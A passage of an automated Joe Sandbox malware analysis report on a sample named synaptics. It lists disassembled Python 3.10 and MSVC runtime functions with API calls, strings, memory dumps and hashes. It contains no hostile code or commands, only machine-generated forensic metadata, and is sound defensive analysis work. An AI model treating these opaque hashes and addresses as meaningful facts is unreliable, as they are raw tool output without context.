                                                                                                                                                                                                      • Opcode ID: 0820aaa43ecbce3fbf195caaaf654c9d58f3ea62d58be965fce7e2ca28316eb4
                                                                                                                                                                                                      • Instruction ID: 57caa91bb67e9e00a49bba41257466554b0b553410694a918e8db06f1748717f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0820aaa43ecbce3fbf195caaaf654c9d58f3ea62d58be965fce7e2ca28316eb4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A319071302A049FDB20EFA9CD44A4AB7F8FF95315B208A5AE556C7E80E730F9048B91
                                                                                                                                                                                                      Function 73A8C2F2 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C35D
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C493
                                                                                                                                                                                                        • Part of subcall function 73A881A7: shared_ptr.LIBCMT ref: 73A881C3
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C4DF
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C4EE
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C449
                                                                                                                                                                                                        • Part of subcall function 73A8DBD8: DName::operator=.LIBVCRUNTIME ref: 73A8DC67
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C61B
                                                                                                                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 73A8C65B
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8C673
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C682
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C68E
                                                                                                                                                                                                        • Part of subcall function 73A8DBD8: Replicator::operator[].LIBVCRUNTIME ref: 73A8DC15
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                                                                                                                                                                                      • String ID: `anonymous namespace'
                                                                                                                                                                                                      • API String ID: 1026175760-3062148218
                                                                                                                                                                                                      • Opcode ID: b1b84dab504bf297389327a98595b10f65cda9e09c6dd6be28d45d326e35d708
                                                                                                                                                                                                      • Instruction ID: c9fe398e718c6bb2c2286b633bb76f084299f060c49d295f0fc1bfb7ccc9e096
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1b84dab504bf297389327a98595b10f65cda9e09c6dd6be28d45d326e35d708
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1C18F719003049FDB16CFA4C986BEAFBF9BB18300F14446EE18AAB2D9EB759545CF50
                                                                                                                                                                                                      Function 6C4B78C0 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 275COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_Ready.PYTHON310(?), ref: 6C4B78DC
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(Cannot extend an incomplete type '%.100s',?), ref: 6C4B7968
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearFromObjectReadyType_Unicode_
                                                                                                                                                                                                      • String ID: @xJlr$Cannot extend an incomplete type '%.100s'$duplicate base class$duplicate base class %U$tynl,
                                                                                                                                                                                                      • API String ID: 766697937-1191235548
                                                                                                                                                                                                      • Opcode ID: 09068ae1c4331ded4a85adac60d92ceade31d1884b5dcf64384e8dc914a6548c
                                                                                                                                                                                                      • Instruction ID: 58ce525edc3cb0970fd60337f672360f4afdbb50fd4e8345adb9316cb5beecb6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09068ae1c4331ded4a85adac60d92ceade31d1884b5dcf64384e8dc914a6548c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A91C171B082058FC700CF28D840E5AB7A1EB8572AF198679EC59A7B51E731E919CBF1
                                                                                                                                                                                                      Function 6C4B7460 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 202COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(00000000,?,?,00000000,00000000,00000000), ref: 6C4B74D4
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,000003E8,Cannot create a consistent method resolutionorder (MRO) for bases,00000000,00000000,00000000), ref: 6C4B7518
                                                                                                                                                                                                      • _PyDict_Next.PYTHON310(?,?,?,?,00000000), ref: 6C4B7540
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(tynl,), ref: 6C4B7561
                                                                                                                                                                                                      • _PyObject_LookupAttr.PYTHON310(?,00000000,?), ref: 6C4B757C
                                                                                                                                                                                                      • PyObject_Repr.PYTHON310(?), ref: 6C4B7589
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?), ref: 6C4B75B8
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,000003E8, %s,6C6F7F24), ref: 6C4B7634
                                                                                                                                                                                                      • _PyDict_Next.PYTHON310(?,?,?,?,00000000), ref: 6C4B7682
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(?), ref: 6C4B769D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_$NextObject_S_snprintfUnicode_$AttrErr_FromItemLookupReadyReprString
                                                                                                                                                                                                      • String ID: %s$,$Cannot create a consistent method resolutionorder (MRO) for bases$tynl,
                                                                                                                                                                                                      • API String ID: 2049988391-2085297395
                                                                                                                                                                                                      • Opcode ID: 109c78bebc520e71dd52938d857d4db5943f255bdb64258f4869db1a9d6b73e7
                                                                                                                                                                                                      • Instruction ID: 4ea7c6a55916b4b634ee4037663b903144e82dd0979352dc0449c0749562e3a2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 109c78bebc520e71dd52938d857d4db5943f255bdb64258f4869db1a9d6b73e7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B61B8715087018BD311CF68DD40E9BB3F8AF95339F140A2DE555A7B91E730EA0987B2
                                                                                                                                                                                                      Function 6C5B0920 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON310(6C5B0103,6C5B0103), ref: 6C5B094A
                                                                                                                                                                                                      • PySet_Add.PYTHON310(00000000,00000000,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B095E
                                                                                                                                                                                                        • Part of subcall function 6C4B0E30: PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0E49
                                                                                                                                                                                                        • Part of subcall function 6C4B0E30: PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0E63
                                                                                                                                                                                                        • Part of subcall function 6C4B0E30: _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\setobject.c,00000916), ref: 6C4B0E8F
                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON310(1174DB85,?,?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B099A
                                                                                                                                                                                                      • PySet_Contains.PYTHON310(00000000,00000000,?,?,?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B09AE
                                                                                                                                                                                                      • PyFile_WriteString.PYTHON310(The above exception was the direct cause of the following exception:,?,?,?,?,?,?,?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B09F6
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B0A06
                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON310(04C483D0,?,?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B0A34
                                                                                                                                                                                                        • Part of subcall function 6C491B30: _PyLong_New.PYTHON310(00000001,?,?,6C4BD9CD,?,00000000,?,-0000000C,6C4BD942), ref: 6C491B69
                                                                                                                                                                                                      • PySet_Contains.PYTHON310(00000000,00000000,?,?,?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B0A48
                                                                                                                                                                                                      • PyFile_WriteString.PYTHON310(During handling of the above exception, another exception occurred:,?,?,?,?,?,?,?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B0A92
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B0AA6
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,6C5B0103), ref: 6C5B0B01
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,6C5B0C01,00000000,?,?,?), ref: 6C5B0B16
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • During handling of the above exception, another exception occurred:, xrefs: 6C5B0A8D
                                                                                                                                                                                                      • The above exception was the direct cause of the following exception:, xrefs: 6C5B09F1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ClearLong_$FromLongSet_Unsigned$ContainsFile_StringSubtypeType_Write$Format
                                                                                                                                                                                                      • String ID: During handling of the above exception, another exception occurred:$The above exception was the direct cause of the following exception:
                                                                                                                                                                                                      • API String ID: 262543306-4039636637
                                                                                                                                                                                                      • Opcode ID: 0b7853e1d5a2cae1b4fe9725cb0973f18f2ca998f19f4762b20b8ca338d60ad0
                                                                                                                                                                                                      • Instruction ID: af0963fd578f3c7624362137ad6f732ae6f80b003017aacd95bc4955d0c7ba83
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b7853e1d5a2cae1b4fe9725cb0973f18f2ca998f19f4762b20b8ca338d60ad0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 995107F19052459BD700CF68DD50A5B7BA4EFC0328F140A2AE865A77A1E730E95ACBD3
                                                                                                                                                                                                      Function 6C566BA0 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 159stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • strrchr.VCRUNTIME140(?,0000002E), ref: 6C566BBF
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,PyErr_NewException: name must be module.class), ref: 6C566BDC
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74DEDC), ref: 6C566C25
                                                                                                                                                                                                      • PyDict_Contains.PYTHON310(?,00000000), ref: 6C566C39
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(Negative size passed to PyUnicode_FromStringAndSize), ref: 6C566C65
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PyUnicode_FromStringAndSize(NULL, size) is deprecated; use PyUnicode_New() instead, xrefs: 6C566C92
                                                                                                                                                                                                      • Negative size passed to PyUnicode_FromStringAndSize, xrefs: 6C566C5A
                                                                                                                                                                                                      • PyErr_NewException: name must be module.class, xrefs: 6C566BD0
                                                                                                                                                                                                      • sOO, xrefs: 6C566D0A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$String$ContainsDict_FromObjectUnicode_strrchr
                                                                                                                                                                                                      • String ID: Negative size passed to PyUnicode_FromStringAndSize$PyErr_NewException: name must be module.class$PyUnicode_FromStringAndSize(NULL, size) is deprecated; use PyUnicode_New() instead$sOO
                                                                                                                                                                                                      • API String ID: 3101110495-1951291677
                                                                                                                                                                                                      • Opcode ID: 6f744cda2c1b63f65c4a263e77e26c4b692cb22dc552fcd685a4e59ee754dcc1
                                                                                                                                                                                                      • Instruction ID: 5ab6b908e003377ccffdf65d692e129da49771efa8678f33371f9423f081b7ca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f744cda2c1b63f65c4a263e77e26c4b692cb22dc552fcd685a4e59ee754dcc1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39411672A007029BD7009E66DD02F4676B4EF9126DF140638EC28E7EA1EF71D91487E2
                                                                                                                                                                                                      Function 6C4A5FA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,%s:%d: ,?,?,?,00000000,?,?,?,6C3ECD62,?,00000000,object already tracked by the garbage collector,D:\a\1\s\Modules\gcmodule.c,000008BB,PyObject_GC_Track), ref: 6C4A5FBA
                                                                                                                                                                                                        • Part of subcall function 6C3F3C50: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,6C4A5FC5,?,00000000,?,?,6C4A5FC5,00000000), ref: 6C3F3C6C
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4A5FE7
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4A5FF3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func$__stdio_common_vfprintffflush
                                                                                                                                                                                                      • String ID: %s:%d: $Assertion failed
                                                                                                                                                                                                      • API String ID: 1030958062-1595534934
                                                                                                                                                                                                      • Opcode ID: ec59455a7b64aaf72caa1cfae8d72bc436c68fad6a41d7d6ae5a7434ffc4a657
                                                                                                                                                                                                      • Instruction ID: de6fa2732997547c1267adacbc1abeb2fec55d211d884cff264eb27512bca602
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec59455a7b64aaf72caa1cfae8d72bc436c68fad6a41d7d6ae5a7434ffc4a657
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B811A5E0A0021427FE00ABA95C0AFAF765C5F5415CF060434FD1DE3782EA25E52589A7
                                                                                                                                                                                                      Function 73A85DD8 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 73A85ED5
                                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 73A85EF3
                                                                                                                                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(19930522,00000000,1FFFFFFF,73A86435,?,?,00000000,00000000,00000000,?,?,?), ref: 73A85F0E
                                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 73A86002
                                                                                                                                                                                                      • __DestructExceptionObject.VCRUNTIME140(?,00000001,19930522,00000000,1FFFFFFF,73A86435,?,?,00000000,00000000,00000000,?,?,?), ref: 73A86086
                                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 73A860D7
                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(19930522,00000000,1FFFFFFF,73A86435,?,?,00000000,00000000,00000000,?,?,?), ref: 73A86111
                                                                                                                                                                                                      • __DestructExceptionObject.VCRUNTIME140(?,00000001,73A90050,19930522,00000000,1FFFFFFF,73A86435,?,?,00000000,00000000,00000000,?,?,?), ref: 73A8611F
                                                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,73A8EED4,73A90050,19930522,00000000,1FFFFFFF,73A86435,?,?,00000000,00000000,00000000,?,?,?), ref: 73A86137
                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 73A86158
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception$DestructObjectSpec$FramesMatchNestedThrowTypeUnwindabortterminatetype_info::operator==
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 1241192187-393685449
                                                                                                                                                                                                      • Opcode ID: 568a103ee843c353a3ba861cd45ee04af1ffa67c8c38f727358cc098ab238322
                                                                                                                                                                                                      • Instruction ID: b06598546619e66854fb9c4c37b61179a31c2b2c03a18a96fc7a169472d155fd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 568a103ee843c353a3ba861cd45ee04af1ffa67c8c38f727358cc098ab238322
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAB15E75800209DFEF07CF94CA42ADEB7BAFF08310B14415BE9566B26AD731DA51CB91
                                                                                                                                                                                                      Function 6C56D910 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 230stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(object of type '%.200s' has no len(),00000000,?,00000000,00000000), ref: 6C56D9D7
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s is not a sequence,00000000,?,00000000,00000000), ref: 6C56DAE1
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • PyErr_Format.PYTHON310('%.200s' object does not support indexing,00000000,?,00000000,00000000), ref: 6C56DAFF
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,00000000,00000000), ref: 6C56DB17
                                                                                                                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,is not retrievable,00000000,?,?,?,?,?,00000000,00000000), ref: 6C56DB36
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(00000000,00000000,must be %d-item sequence, not %.50s,00000000,?,?,00000000,00000000), ref: 6C56DB74
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
